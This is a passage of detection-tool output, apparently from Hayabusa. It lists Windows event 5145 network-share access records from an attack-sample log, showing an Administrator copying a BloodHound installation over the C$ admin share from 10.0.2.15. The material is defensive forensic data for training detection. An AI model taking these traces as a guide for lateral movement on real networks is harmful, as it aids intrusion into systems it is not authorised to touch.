Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
-2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator 
: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share 
File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
